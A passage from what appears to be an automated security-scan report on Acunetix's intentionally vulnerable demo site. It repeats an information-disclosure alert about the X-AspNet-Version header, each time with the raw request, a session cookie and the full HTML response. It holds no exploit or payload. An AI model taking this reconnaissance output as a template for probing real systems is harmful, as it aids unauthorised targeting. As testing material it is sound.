href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 13914Response body (13914 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9dpx0P1QE7KvkQnKR4Ij212SQ8lw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a> <DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/default.aspx
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (316 bytes)
GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" 